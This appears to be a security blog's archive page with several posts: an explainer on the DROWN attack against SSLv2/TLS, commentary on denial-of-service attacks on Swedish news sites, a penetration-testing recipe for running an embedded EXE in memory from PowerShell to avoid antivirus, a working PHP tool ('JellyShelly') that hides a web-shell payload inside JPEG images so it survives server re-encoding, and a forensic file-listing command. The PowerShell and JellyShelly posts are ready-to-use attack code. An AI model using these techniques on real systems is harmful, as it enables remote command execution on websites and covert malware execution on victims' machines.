DROWN exploits the fact that SSLv2, because of support for weak 40-bit export-grade ciphers, is vulnerable to a kind of padding oracle attack that was first introduced by David Bleichenbacher in 1998. The DROWN researchers have shown us that this oracle can also be used to decrypt a modern TLS connection if the same certificate, hence the same RSA key pair, is used for serving both SSLv2 and TLS.

Bleichenbacher’s attack, and therefore also DROWN, applies to a particular padding scheme called “PKCS#1 v1.5” which is standard for RSA-based handshakes for both SSL and TLS. A padding scheme is used to expand a piece of plain-text to make it conform to the block size of a particular cipher algorithm.

Bleichenbacher showed how an attacker can deduce the plain-text contents of an encrypted message if the server discloses whether or not any submitted cipher-text is decrypted by the server into a correctly padded message according to the PKCS#1 v1.5 standard. Using a succession of chosen cipher-texts which are related to the target cipher-text, the attacker can then successively narrow the interval of possible values for the target plain-text. The submitted cipher-texts are successively refined based on the responses from the server and this is repeated until the interval of possible values for the target plain-text has been reduced to contain only the target plain-text itself. Bleichenbacher showed how this attack could be used on contemporary SSL handshakes to obtain the session keys of a recorded session.

The countermeasure for Bleichenbacher’s attack in SSL/TLS implementations is to protect the handshake by not letting the server disclose whether or not the “ClientKeyExchange” message contains a correctly padded PMS. Instead, if the server finds a wrongly padded PMS when decrypting the “ClientKeyExchange” message, then the server will randomly make up its own PMS and go ahead with the protocol. The protocol will then fail when the client and server exchange “finished” messages to conclude the handshake. The “finished” messages are encrypted using the derived session keys and if the server generated its own PMS, instead of getting it from the client, then the server’s derived session keys will not match whatever keys the client has come up with. The communication will then fail without having told the client whether or not the PMS was correctly padded and Bleichenbacher’s attack is therefore prevented.

With this countermeasure in mind we now note that if an attacker would send the same cipher-text twice then one of two things will happen: Either the cipher-text can be decrypted by the server into a correctly padded PMS message and the server will calculate session keys from the received PMS, or: The decrypted PMS will not be correctly padded and the server will randomly generate a PMS on its own. Having submitted the same cipher-text twice the first case will result in the server using same PMS twice to derive the session keys. The second case will result in two different randomly selected PMSs. So if there is a way for the attacker to tell if the server has used the same PMS twice when deriving the session keys then Bleichenbacher’s attack is re-enabled.

This is where the insufficiency of SSLv2 comes into play.

How SSLv2 breaks everything

SSLv2 has many flaws. Particularly two of them allow the attacker to learn whether or not the server has used the same PMS* for two handshakes.

(* In SSLv2 there actually is no “PMS”, instead there is a “Master Key”, also chosen by the client. But that’s beside the point and I’m going to keep referring to it as “PMS” for simplicity.)

Flaw 1: In the SSLv2 protocol (or at least all of its implementations) the server eagerly responds with a “ServerVerify” message immediately upon receiving the PMS, before the client has demonstrated knowledge of the session keys. The “ServerVerify” message is simply a random number, chosen by the client in the first stage of the handshake, encrypted using the server’s derived session key. The purpose of this message is to demonstrate to the client that the server knows its public key and has successfully derived the session keys.

Flaw 2: SSLv2 allows export-grade 40-bit encryption whose 2^40 key space can feasibly be searched by brute-force.

When exploiting these flaws the attacker will send its candidate cipher-text to the server and receive the “ServerVerify” message. The attacker will then perform a brute-force search over all 2^40 possibilities for the export-grade PMS to find the PMS that derives a server session key that successfully decrypts the “ServerVerify” message. The attacker will know when a brute-force attempt is successful because the message will then decrypt into the random number he has previously chosen.

Having found the PMS of the first message the attacker then submits the same candidate cipher-text again and receives the “ServerVerify” message. He now uses the PMS found from the first message to derive the server session key for this second session. If this server session key successfully decrypts the “ServerVerify” message then the attacker knows that the server has arrived at the same PMS twice, turning the server into a Bleichenbacher oracle.

This is DROWN: Bleichenbacher’s attack on RSA resurrected because of the weakness of SSLv2.

TLS is not SSL but…

There is one complication that an attacker must overcome in order to exploit DROWN to obtain the plain-text PMS from a victim’s TLS session: A “ClientKeyExchange” message for the TLS protocol does not necessarily conform to a 5-byte (40-bit) export-grade plain-text padded according to PKCS#1 v1.5. In fact, the chances that it does are pretty slim. However, it turns out that the attacker can apply cleverly chosen multiplication factors in order to greatly improve the chances of a target cipher-text being PKCS#1 v1.5 export-grade compliant. The attacker can expect success for about 1 in 1000 eavesdropped TLS connections.

Also the attack yields only a few plain-text bytes at a time because of the tiny key/PMS of the export-grade cipher. However this is a minor obstacle because the attacker can “rotate” the plain-text part exposed by the oracle to successively work out the full TLS PMS of the victim’s session. The underlying mathematics are quite involved and I refer the reader to the original paper for studying the details.

All-in-all, an attacker can expect to decrypt about 1 in 1000 recorded TLS sessions at the cost of $440 on Amazon EC2. Brute-forcing the “ServerVerify” message accounts for the larger part of the computational cost of performing the attack.

Special DROWN turns bad into worse!

This article has studied the general case. I would now like to turn your attention to “special DROWN”. When discovering DROWN the researches also discovered a bug in OpenSSL that was fixed by coincidence on March 4, 2015. This bug has been designated CVE-2016-0703 and the researchers were able to exploit it for DROWN to cut the number of required oracle connections by 50% and reduce the computational effort to perform in less than a minute on a single PC.

So, vulnerable OpenSSL installations that predate march 4 2015 cost essentially nothing to attack. The general DROWN attack has a significant price tag attached to it but one can expect it to be well within the business margin of a high-value target.

In conclusion, DROWN is a serious threat.

Posted in Security

Problematic denial of service attacks

If you are a regular reader of any relatively large Swedish newspaper, the recent attack on Swedish media this weekend probably have not escaped your notice. At approximately 20:00 Saturday evening on the 19th of March, a number of denial of service attacks began towards Swedish media websites.

Some of the confirmed victims were (source):
http://www.aftonbladet.se/
http://www.expressen.se/
http://www.dn.se/
http://www.svd.se/
http://www.sydsvenskan.se/
http://www.di.se/
http://www.hd.se/
http://vlt.se/
http://na.se/

Shortly before the attacks started a threat was made via a twitter account, saying that attacks were going to be aimed towards Swedish media and government websites in the following days.

notJ-Twitter

The reason for the attacks being “spreading false propaganda” is pretty vague but I’m not writing this article to speculate on that. A lot of people are speculating that the attacks originated from Russia since most (if not all) of the abusive traffic seemed to come from there. I don’t think we should focus too much on the Russian angle. It might as well be someone from inside Sweden who bought a botnet and want to test Its capacity. Think about it, if you wanted to buy a large amount of infected computers that are close to your targets in Sweden, where would you turn to first? I know where I would go at least.

Russia is a large country with a lot of Internet users (103,147,691) and there is a culture of selling botnets with infected Russian machines. This makes it ideal for someone looking to buy cheap bots. It’s also important to remember that there are no borders on the Internet. If you are an American wanting to attack a Russian server, you might as well use Russian bots simply because they are easy to acquire and are less hops away from the target machine. But it might of course also be a botnet from other countries, and not just Russia. It’s just that in this case it happened to come mostly from there.

Personally I find the low bandwidth types of denial of service very interesting, where you use a flaw in the application to either exhaust the server’s resources or to cause a crash via some sort of bug. I’m not too much of a fan of the regular distributed denial of service attacks where, if you scream loud enough, the infrastructure will give in to the pressure. But there are high traffic attacks that can be quite fascinating, like an NTP amplification attack. While I’m at it I would also like to mention the THC SSL DoS attack that was released in 2011 and is still usable today for stressing an SSL endpoint on a server.

I don’t know of the exact nature of the attack against the media websites but one could speculate that it could be a combination where a botnet would attack a resource on the target system that consumes a lot of resources, which could then effectively take down the server. One thought that crossed my mind was that some of these systems handle a large amount of traffic every day and was still taken down what seemed to be fairly simple.

Play with the thought of the perpetrators finding a page on these sites that either takes relatively lot of time to load because it has to make a large amount of queries to a database. Or let’s say they found a debug page that only says “hello world” and then does a bunch of background processing to test the back end server. It might not output any interesting data that an attacker can make use of (thus it being a low priority for the site maintainer to remove), but it can still be very useful in a denial of service attack.

Protecting against denial of service is not just as “one package” solution (even though there are packaged solutions that would surely help these sites a lot). The fact that these systems were taken down on a weekend, in the evening as well when. One would expect the traffic to be low, only shows how vulnerable these systems are. And it can also be seen as a message from the perpetrators saying that “we can do this whenever we want”, which then of course also messages other evil villains on the Internet that the Swedish media systems are easy targets.

Depending on the exact nature of the attack the solution to these problems will need some serious planning and dedication. Some of the solutions to denial of service issues are just a patch away, some not. If a large organisation with services that need to stay online wants to protect against these problems, they will also have to test against them. And I’m not only talking about the regular DDoS attack that overflows the infrastructure with too much data, but also the low bandwidth sneak attacks like Slowloris, slowpost, slowget, slowread and all other kinds of similar attacks (slow loading pages, crash flaws, SQL-injecting sleep calls, etc) that would need a security review to be discovered and properly taken care of. One solution that comes to mind is decentralization like Akamai has to offer, where a service can be spread out geographically so that a user accessing the service will get a node that is fewer hops away. This kind of setup also helps to mitigate denial of service attacks.

In this case it doesn’t really matter to me who actually carried out the attacks. It’s bad enough that the systems were all taken down, and the people responsible for those infrastructures need to learn from this and take action soon so that it won’t happen again. And this also makes you think about other critical infrastructure in the country, government websites, hospitals etc. Is it all just a catastrophe waiting to happen? Even if we were to find the one(s) responsible for these attacks the fact remains that a lot of sytems are vulnerable to some type of denial of service. The most future proof solution, generally, would be to build software architecture and infrastructure that solves these problems.

As of writing this the only attack so far was the one during Saturday night. The twitter account that made the initial threat has been removed (by whom is uncertain). Although it’s not confirmed that the attacks are actually linked to that specific account, the timing was just too good for it to be rejected as pure coincidence.

I would like to thank Emil Kvarnhammar, Marcus Murray, Stefan Ivarsson and Simon Strandberg for insightful input when writing this article.

Tagged with: ,
Posted in Security

Embedding EXE files into PowerShell scripts

As sometimes happens, when you solve a particular problem, you realize that the solution can be generalized to cover more scenarios than the one you had in mind. This is one of those stories.

I was trying to resolve an issue with creating a pure PowerShell payload as part of a client-side attack. Using PowerShell to run malicious code has many advantages, including:

  • No need to install anything on the target.
  • Very powerful engine underneath (e.g. you can directly invoke .NET code).
  • You can use base64-encoded commands to obfuscate your evil commands, making the attack a little less obvious to spot. This is also a way to avoid escaping all the special characters, especially in advanced attacks involving several steps to deliver the payload.
  • You can use Invoke-Expression to interpret strings as PowerShell commands. From a penetration tester’s perspective, this is very useful to avoid writing complex scripts on disk. For example, you can use PowerShell to download an additional (complex) script, and pipe it directly to Invoke-Expression, which will interpret and execute the downloaded script in memory, within the PowerShell process. This also avoid antivirus detection.

The payload I wanted to run on the target included fairly complex functionalities. I had those functionalities as part of an EXE file. I didn’t want to drop the binary on the target system since it could potentially trigger an antivirus. I wanted to use PowerShell, but I didn’t want to rewrite the whole thing in PowerShell.

So I came up with a solution.

The objective is to embed a binary into a PowerShell script, and run it from within the script without writing it on disk.

This is how the solution works:

1. Take your binary file and base64-encode it

You can use the following function:

function Convert-BinaryToString {

   [CmdletBinding()] param (

      [string] $FilePath

   )

   try {

      $ByteArray = [System.IO.File]::ReadAllBytes($FilePath);

   }

   catch {

      throw "Failed to read file. Ensure that you have permission to the file, and that the file path is correct.";

   }

   if ($ByteArray) {

      $Base64String = [System.Convert]::ToBase64String($ByteArray);

   }

   else {

      throw '$ByteArray is $null.';

   }

   Write-Output -InputObject $Base64String;

}

2. Create a new script with the following:

  • The EXE converted to string created in point 1
  • The function Invoke-ReflectivePEInjection (part of the Powersploit project)
  • Convert the string to byte array
  • Call Invoke-ReflectivePEInjection

So basically your binary is just a string in the PowerShell script. Once decoded as a byte array, the function Invoke-ReflectivePEInjection (part of the Powersploit project) will run it in memory within the PowerShell process.

The final payload will look something like this:

# Your base64 encoded binary

$InputString = '...........'

function Invoke-ReflectivePEInjection

{

   ......
   ......
   ......

}

# Convert base64 string to byte array

$PEBytes = [System.Convert]::FromBase64String($InputString)

# Run EXE in memory

Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"

You can now run the script on the target like this:

powershell -ExecutionPolicy Bypass -File payload.ps1

Depending on the binary you embedded, you might get the following error:

PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)

To fix the issue, simply run the 32 bit PowerShell:

%windir%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File payload.ps1

In the example below, I embedded plink.exe in payload.ps1

Capture - Copy

Pretty cool, uh?

Posted in Hacking

JellyShelly 1.7, progress has been made

So I decided it was time to update this script to make it easier to handle. I realized a little while ago that it was quite hard to use since this little trick doesn’t work on all images. Therefore if you wanted to inject code into an image, you would sometimes have to sit several hours, running the script over and over with different images until you got a hit. This isn’t optimal and therefore I have made some simple adjustments to the script.

By using one of the many neat placeholder image services online🙂.

Two of these are:

https://placehold.it/
http://lorempixel.com/

The first one only offers grey images, so I picked the second one which offers all kinds of images (which is more fun and stealthy). What the script will do now, is that it will simply download a random image of random size (100-1500 width/height) and use it to try to inject data. If it succeeds then it will save the result image (which you can later use with an upload function that uses the imagejpeg function). If it fails however, it will remove the image, and download a new one. At the moment the script will run until it succeeds.

Later on I might add some more advanced functionality, as well as a more refined and usable interface for the script. Two functions I wish to implement are re-sizing of images, and images where watermarks are added during the process.

Anyway, code!

<?php
ini_set('display_errors', 1);
error_reporting(E_PARSE);

$orig = 'image.jpg';
$code = '<?=exec($_GET["c"]))?>';
$quality = "80";
$base_url = "http://lorempixel.com";
/*$code = '<?php system($_GET["c"])?>';*/
/*$code = '<?=$a=`ls`?>';*/

echo "-=Imagejpeg injector 1.7=-\n";

do 
{
    $x = rand(100, 1500);
    $y = rand(100, 1500);
    $url = $base_url . "/$x/$y/";

    echo "[+] Fetching image ($x X $y)\n";
    file_put_contents($orig, file_get_contents($url));
} while(!tryInject($orig, $code, $quality));

echo "[+] It seems like it worked!\n";
echo "[+] Result file: image.jpg.php\n";

function tryInject($orig, $code, $quality)
{ 
    $result_file = 'image.jpg.php';
    $tmp_filename = $orig . '_mod2.jpg';

    //Create base image and load its data
    $src = imagecreatefromjpeg($orig);
    imagejpeg($src, $tmp_filename, $quality);
    $data = file_get_contents($tmp_filename);
    $tmpData = array();
     
    echo "[+] Jumping to end byte\n";
    $start_byte = findStart($data);
     
    echo "[+] Searching for valid injection point\n";
    for($i = strlen($data)-1; $i > $start_byte; --$i)
    {
        $tmpData = $data;
        for($n = $i, $z = (strlen($code)-1); $z >= 0; --$z, --$n)
        {
            $tmpData[$n] = $code[$z];
        }
     
        $src = imagecreatefromstring($tmpData);
        imagejpeg($src, $result_file, $quality);
     
        if(checkCodeInFile($result_file, $code))
        {
            unlink($tmp_filename);
            unlink($result_file);
            sleep(1);
     
            file_put_contents($result_file, $tmpData);
            echo "[!] Temp solution, if you get a 'recoverable parse error' here, it means it probably failed\n";
     
            sleep(1);
            $src = imagecreatefromjpeg($result_file);

            return true;
        }
        else
        {
            unlink($result_file);
        }
    }
    	unlink($orig);
    	unlink($tmp_filename);
    	return false; 
}

function findStart($str)
{
    for($i = 0; $i < strlen($str); ++$i)
    {
        if(ord($str[$i]) == 0xFF && ord($str[$i+1]) == 0xDA)
        {
            return $i+2;
        }
    }
 
    return -1;
}
 
function checkCodeInFile($file, $code)
{
    if(file_exists($file))
    {
        $contents = loadFile($file);
    }
    else
    {
        $contents = "0";
    }
 
    return strstr($contents, $code);
}
 
function loadFile($file)
{
    $handle = fopen($file, "r");
    $buffer = fread($handle, filesize($file));
    fclose($handle);
 
    return $buffer;
}

Some sample output

-=Imagejpeg injector 1.7=-
[+] Fetching image (1409 X 934)
[+] Jumping to end byte
[+] Searching for valid injection point
[!] Temp solution, if you get a 'recoverable parse error' here, it means it probably failed
[+] It seems like it worked!
[+] Result file: image.jpg.php

An important note about the current state of the script is the “Temp solution” message.
What it means is that if you get an error such as the one below, then it most likely means that the process failed.

In which case you should restart the script. This happens from time to time and is so far something that I haven’t been able to detect, and thus not been able to automate the handling of it. If anyone has a solution for that issue, feel free to comment below.

PHP Parse error: imagecreatefromjpeg(): gd-jpeg, libjpeg: recoverable error:
in Workspace/jellyshell/jellyauto.php on line 63

Parse error: imagecreatefromjpeg(): gd-jpeg, libjpeg: recoverable error:
in Workspace/jellyshell/jellyauto.php on line 63

 

Tagged with: , , ,
Posted in Hacking

Generating a useful file listing using PowerShell

When trying to figure out what happened on a machine during a specific time-frame, a sorted file listing is quite useful.

There are several ways of going about it when creating one, and as requested, here’s the way I do it in PowerShell.


Get-ChildItem -Recurse | Sort-Object CreationTime | Format-Table CreationTime,FullName -auto

Tagged with:
Posted in General
Categories